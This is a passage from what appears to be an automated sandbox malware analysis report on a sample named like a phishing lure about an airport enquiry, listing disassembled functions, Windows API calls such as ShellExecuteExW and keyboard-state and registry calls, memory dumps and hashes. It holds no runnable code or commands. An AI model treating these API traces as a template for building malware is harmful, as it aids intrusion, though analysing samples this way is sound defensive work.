            • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,00CBC417,00000004,00000000,00000000,00000000), ref: 00CBC46A
            • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00CBC417,00000004,00000000,00000000,00000000), ref: 00CBC4D6
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: ShowWindow
            • String ID:
            • API String ID: 1268545403-0
            • Opcode ID: 73af77dddbdfb558ae9f845183098f25fa860dc4c823435ea8790eff579036e6
            • Instruction ID: d79e3a925cebe2060e4ff43e120d984dabf4353658742656bf731da3c026115d
            • Opcode Fuzzy Hash: 73af77dddbdfb558ae9f845183098f25fa860dc4c823435ea8790eff579036e6
            • Instruction Fuzzy Hash: F4412C352047809BC73DAB29CCDC7FB7B92AF96308F64841DE06787660C6359A41F729
            Function 00CE7368 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON
            Download Yara Rule
            APIs
            • InterlockedExchange.KERNEL32(?,000001F5), ref: 00CE737F
              • Part of subcall function 00CA0FF6: std::exception::exception.LIBCMT ref: 00CA102C
              • Part of subcall function 00CA0FF6: __CxxThrowException@8.LIBCMT ref: 00CA1041
            • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00CE73B6
            • EnterCriticalSection.KERNEL32(?), ref: 00CE73D2
            • _memmove.LIBCMT ref: 00CE7420
            • _memmove.LIBCMT ref: 00CE743D
            • LeaveCriticalSection.KERNEL32(?), ref: 00CE744C
            • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00CE7461
            • InterlockedExchange.KERNEL32(?,000001F6), ref: 00CE7480
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
            • String ID:
            • API String ID: 256516436-0
            • Opcode ID: 9611a01ba71358ee2f2e22b3fb7b7c7442e188eb78bfd374d318da0ffc0d02e9
            • Instruction ID: fd8b59398afc5c43ffdf9065c2f4031fdc4abbcddb78962624983b5042db1b5c
            • Opcode Fuzzy Hash: 9611a01ba71358ee2f2e22b3fb7b7c7442e188eb78bfd374d318da0ffc0d02e9
            • Instruction Fuzzy Hash: CE318F35904205EBCF10EFA5DC85AAE7B78EF45710F2441A9FD04EB256DB709E10DBA4
            Function 00D06442 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
            Download Yara Rule
            APIs
            • DeleteObject.GDI32(00000000), ref: 00D0645A
            • GetDC.USER32(00000000), ref: 00D06462
            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00D0646D
            • ReleaseDC.USER32(00000000,00000000), ref: 00D06479
            • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00D064B5
            • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00D064C6
            • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00D09299,?,?,000000FF,00000000,?,000000FF,?), ref: 00D06500
            • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00D06520
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
            • String ID:
            • API String ID: 3864802216-0
            • Opcode ID: 09bf7a0282aadd8070fcd90afb2ec28a6939cb74794ac56eab31559ecaff6a31
            • Instruction ID: c1185ee9dd734b144e6fc62b408f45d5e82883c921dcd4a6456c41e2ff4e7763
            • Opcode Fuzzy Hash: 09bf7a0282aadd8070fcd90afb2ec28a6939cb74794ac56eab31559ecaff6a31
            • Instruction Fuzzy Hash: D6316B72201214BFEB218F50DC8AFEA3FA9EF09761F084065FE0CDA295D6759851CBB4
            Function 00CDC072 Relevance: 12.1, APIs: 8, Instructions: 92COMMON
            Download Yara Rule
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: _memcmp
            • String ID:
            • API String ID: 2931989736-0
            • Opcode ID: 041904e6f2a5944d688040bdfe1a5f008dee1d398823eabf645b4c1a4bab003d
            • Instruction ID: 67c28d38090a8f8d02bea38c404e7a49d2499e803caaf2a07f60c4794b7f0571
            • Opcode Fuzzy Hash: 041904e6f2a5944d688040bdfe1a5f008dee1d398823eabf645b4c1a4bab003d
            • Instruction Fuzzy Hash: 67218371641217BB9714A521ADC2FBF236DEF21398F084022FF0596382EB52EE25D2E5
            Function 00CEED8E Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON
            Download Yara Rule
            APIs
              • Part of subcall function 00C89997: __itow.LIBCMT ref: 00C899C2
              • Part of subcall function 00C89997: __swprintf.LIBCMT ref: 00C89A0C
              • Part of subcall function 00C9FEC6: _wcscpy.LIBCMT ref: 00C9FEE9
            • _wcstok.LIBCMT ref: 00CEEEFF
            • _wcscpy.LIBCMT ref: 00CEEF8E
            • _memset.LIBCMT ref: 00CEEFC1
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: _wcscpy$__itow__swprintf_memset_wcstok
            • String ID: X
            • API String ID: 774024439-3081909835
            • Opcode ID: 77ef351c3cd453a0431f7fc88dcc5cc6d67c8e0742fffd971d065786c2ea4151
            • Instruction ID: 0588235e3cca9ac75abe85ec1f55bc3c70d75624c106411e2a3de04f6f42ad9a
            • Opcode Fuzzy Hash: 77ef351c3cd453a0431f7fc88dcc5cc6d67c8e0742fffd971d065786c2ea4151
            • Instruction Fuzzy Hash: A8C1A0315083419FC724EF24C881AAEB7E4FF85318F14492DF89A972A2DB70ED45DB86
            Function 00C81424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 09a16364aa1d83ea0763703efda121693595c5e9657b0fd5f373b02bf9632028
            • Instruction ID: 961304c933d65ebc192cb9ac744b2e8cd11267b2262e7d7af32574507649791b
            • Opcode Fuzzy Hash: 09a16364aa1d83ea0763703efda121693595c5e9657b0fd5f373b02bf9632028
            • Instruction Fuzzy Hash: 4D717E30900109FFCB14DF99CC49ABEBBB9FF85314F288159F915AA251C730AA52CFA4
            Function 00CF6E8A Relevance: 10.7, APIs: 7, Instructions: 212COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 1597b6ff01cbd5d86b46cc45beeeeaf24122072abab4c11689f1235d7d437875
            • Instruction ID: 03be7196e9da76be881a6c20e8a00b4f806d692b350d1921f03523907a5872d4
            • Opcode Fuzzy Hash: 1597b6ff01cbd5d86b46cc45beeeeaf24122072abab4c11689f1235d7d437875
            • Instruction Fuzzy Hash: 5D61AB71508304ABC720EB24CC85F7FB7E9EF84718F144A19F656972A2DB70AE04D792
            Function 00D0B60B Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON
            Download Yara Rule
            APIs
            • IsWindow.USER32(01655828), ref: 00D0B6A5
            • IsWindowEnabled.USER32(01655828), ref: 00D0B6B1
            • SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 00D0B795
            • SendMessageW.USER32(01655828,000000B0,?,?), ref: 00D0B7CC
            • IsDlgButtonChecked.USER32(?,?), ref: 00D0B809
            • GetWindowLongW.USER32(01655828,000000EC), ref: 00D0B82B
            • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00D0B843
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: MessageSendWindow$ButtonCheckedEnabledLong
            • String ID:
            • API String ID: 4072528602-0
            • Opcode ID: 7032a210a250a43a15a2e130b3f892714dd2318dd1a52ab810947dde15fbc8ad
            • Instruction ID: a2ad5553cf98b7d973527f516bc6c64e485c43d1530458b2b4a6e6247c1fab78
            • Opcode Fuzzy Hash: 7032a210a250a43a15a2e130b3f892714dd2318dd1a52ab810947dde15fbc8ad
            • Instruction Fuzzy Hash: E5719334608304AFDB20DF54C894FAA77B9EF89320F58445AE94A973E1C772AC41DB74
            Function 00CFF732 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON
            Download Yara Rule
            APIs
            • _memset.LIBCMT ref: 00CFF75C
            • _memset.LIBCMT ref: 00CFF825
            • ShellExecuteExW.SHELL32(?), ref: 00CFF86A
              • Part of subcall function 00C89997: __itow.LIBCMT ref: 00C899C2
              • Part of subcall function 00C89997: __swprintf.LIBCMT ref: 00C89A0C
              • Part of subcall function 00C9FEC6: _wcscpy.LIBCMT ref: 00C9FEE9
            • GetProcessId.KERNEL32(00000000), ref: 00CFF8E1
            • CloseHandle.KERNEL32(00000000), ref: 00CFF910
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
            • String ID: @
            • API String ID: 3522835683-2766056989
            • Opcode ID: c99ec98eb7b8a75b15cf5d9c725944ec84c2d0481fb20861cfb95cbc08fcb1a6
            • Instruction ID: e9c5886ff92fd4883d473e26f28d523cb3cf63dd60034c7ddea265a1ff6d1f09
            • Opcode Fuzzy Hash: c99ec98eb7b8a75b15cf5d9c725944ec84c2d0481fb20861cfb95cbc08fcb1a6
            • Instruction Fuzzy Hash: 3B61AE75A006199FCF14EF54C4809AEBBF0FF49314F15806DE95AAB391CB30AE42DB95
            Function 00CE145D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON
            Download Yara Rule
            APIs
            • GetParent.USER32(?), ref: 00CE149C
            • GetKeyboardState.USER32(?), ref: 00CE14B1
            • SetKeyboardState.USER32(?), ref: 00CE1512
            • PostMessageW.USER32(?,00000101,00000010,?), ref: 00CE1540
            • PostMessageW.USER32(?,00000101,00000011,?), ref: 00CE155F
            • PostMessageW.USER32(?,00000101,00000012,?), ref: 00CE15A5
            • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00CE15C8
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: MessagePost$KeyboardState$Parent
            • String ID:
            • API String ID: 87235514-0
            • Opcode ID: 4af33848fea8c2ac3f349205dbd5ae885e61dc3fc6135c20e67ffb0dd615e570
            • Instruction ID: c335a577e13bc6678d9db9ff82011e6cad18c3f4c8559faa680f451ab6f80d91
            • Opcode Fuzzy Hash: 4af33848fea8c2ac3f349205dbd5ae885e61dc3fc6135c20e67ffb0dd615e570
            • Instruction Fuzzy Hash: A051E3B06047D53DFB3242268C45BBABEE96B46304F0C4489F9E6458C2C2E89EA4D750
            Function 00CE1276 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
            Download Yara Rule
            APIs
            • GetParent.USER32(00000000), ref: 00CE12B5
            • GetKeyboardState.USER32(?), ref: 00CE12CA
            • SetKeyboardState.USER32(?), ref: 00CE132B
            • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00CE1357
            • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00CE1374
            • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00CE13B8
            • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00CE13D9
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: MessagePost$KeyboardState$Parent
            • String ID:
            • API String ID: 87235514-0
            • Opcode ID: 7504bfff591b91e05fbda7dceb16880740dfbc8a6bf076e6c35db6dccdd20f65
            • Instruction ID: 76fd3bc7333d2b229f617d054d4154a6526e030026cf0ed54d4cae56f17af9bc
            • Opcode Fuzzy Hash: 7504bfff591b91e05fbda7dceb16880740dfbc8a6bf076e6c35db6dccdd20f65
            • Instruction Fuzzy Hash: 8951E7B05047D53DFB3287268C45BBA7FA95F06300F0C4589E9E446DD2D3A5EEA4E760
            Function 00CE589F Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON
            Download Yara Rule
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: _wcsncpy$LocalTime
            • String ID:
            • API String ID: 2945705084-0
            • Opcode ID: 60fb4eb18dc395b2ca2ef871640d8805203bc268b187b50f8734935c7a48d04f
            • Instruction ID: 457de66400d3b48c7524bbb18f22ce60ea0f23fead4011f27a3f335408c5fe2a
            • Opcode Fuzzy Hash: 60fb4eb18dc395b2ca2ef871640d8805203bc268b187b50f8734935c7a48d04f
            • Instruction Fuzzy Hash: E641E6B6C2026976CB10EBB5CC86ACF77B89F06314F508562F518E3221E734D745E3A5
            Function 00CE38AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON
            Download Yara Rule
            APIs
              • Part of subcall function 00CE48AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00CE38D3,?), ref: 00CE48C7
              • Part of subcall function 00CE48AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00CE38D3,?), ref: 00CE48E0
            • lstrcmpiW.KERNEL32(?,?), ref: 00CE38F3
            • _wcscmp.LIBCMT ref: 00CE390F
            • MoveFileW.KERNEL32(?,?), ref: 00CE3927
            • _wcscat.LIBCMT ref: 00CE396F
            • SHFileOperationW.SHELL32(?), ref: 00CE39DB
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
            • String ID: \*.*
            • API String ID: 1377345388-1173974218
            • Opcode ID: db7da8c298f9bee181626dfd1bddd012145f10ebf4a2889d7214482c63839b20
            • Instruction ID: 34fdbae8f234456399e4a48c8d575281376655275d8a597231555a279b4d0ed0
            • Opcode Fuzzy Hash: db7da8c298f9bee181626dfd1bddd012145f10ebf4a2889d7214482c63839b20
            • Instruction Fuzzy Hash: FA41BFB21083C49EC751EF65C485AEBB7E8AF88340F14092EB499C3192EB74E788C752
            Function 00D07500 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON
            Download Yara Rule
            APIs
            • _memset.LIBCMT ref: 00D07519
            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00D075C0
            • IsMenu.USER32(?), ref: 00D075D8
            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00D07620
            • DrawMenuBar.USER32 ref: 00D07633
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Menu$Item$DrawInfoInsert_memset
            • String ID: 0
            • API String ID: 3866635326-4108050209
            • Opcode ID: 3026bd99556300817bc46c11dd5c96baaa436361fd05aa89698eb0f980fac5a6
            • Instruction ID: b71c32ddb1b67f15ad41d3648b9dab77933a5454ced8f436c21c07d149e3fecd
            • Opcode Fuzzy Hash: 3026bd99556300817bc46c11dd5c96baaa436361fd05aa89698eb0f980fac5a6
            • Instruction Fuzzy Hash: CA411775A04609EFDB20DF54D884E9ABBF8FB09314F588129E95A9B390D731ED50CFA0
            Function 00D0122D Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON
            Download Yara Rule
            APIs
            • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00D0125C
            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00D01286
            • FreeLibrary.KERNEL32(00000000), ref: 00D0133D
              • Part of subcall function 00D0122D: RegCloseKey.ADVAPI32(?), ref: 00D012A3
              • Part of subcall function 00D0122D: FreeLibrary.KERNEL32(?), ref: 00D012F5
              • Part of subcall function 00D0122D: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00D01318
            • RegDeleteKeyW.ADVAPI32(?,?), ref: 00D012E0
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: EnumFreeLibrary$CloseDeleteOpen
            • String ID:
            • API String ID: 395352322-0
            • Opcode ID: 6a42326cc067aa9c516fd9a0df7efc556756777617c104edd5824ef187b49e42
            • Instruction ID: 3544b472fdaefb57efc3f3db90cb115f9bebaf78bad743c4c9114a95d18f0cf1
            • Opcode Fuzzy Hash: 6a42326cc067aa9c516fd9a0df7efc556756777617c104edd5824ef187b49e42
            • Instruction Fuzzy Hash: 19312D75901219BFDB14DFA0DC89BFEB7BCEF08300F140169E509E2691DA749E859AB4
            Function 00D0653C Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
            Download Yara Rule
            APIs
            • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00D0655B
            • GetWindowLongW.USER32(01655828,000000F0), ref: 00D0658E
            • GetWindowLongW.USER32(01655828,000000F0), ref: 00D065C3
            • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00D065F5
            • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00D0661F
            • GetWindowLongW.USER32(?,000000F0), ref: 00D06630
            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00D0664A
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: LongWindow$MessageSend
            • String ID:
            • API String ID: 2178440468-0
            • Opcode ID: c784e634109982c81e1d42df9bd2c710925d1ac94773701410b4a80ace1c6d22
            • Instruction ID: 5bb33fc8b12be720ecb2a3174d725780b10d46f290af47dd59fb2d9c1f163005
            • Opcode Fuzzy Hash: c784e634109982c81e1d42df9bd2c710925d1ac94773701410b4a80ace1c6d22
            • Instruction Fuzzy Hash: EE31D234604250AFDB21CF58DC89F553BE1FB4A710F6901A8F51ACB2F5CB62E860DB61
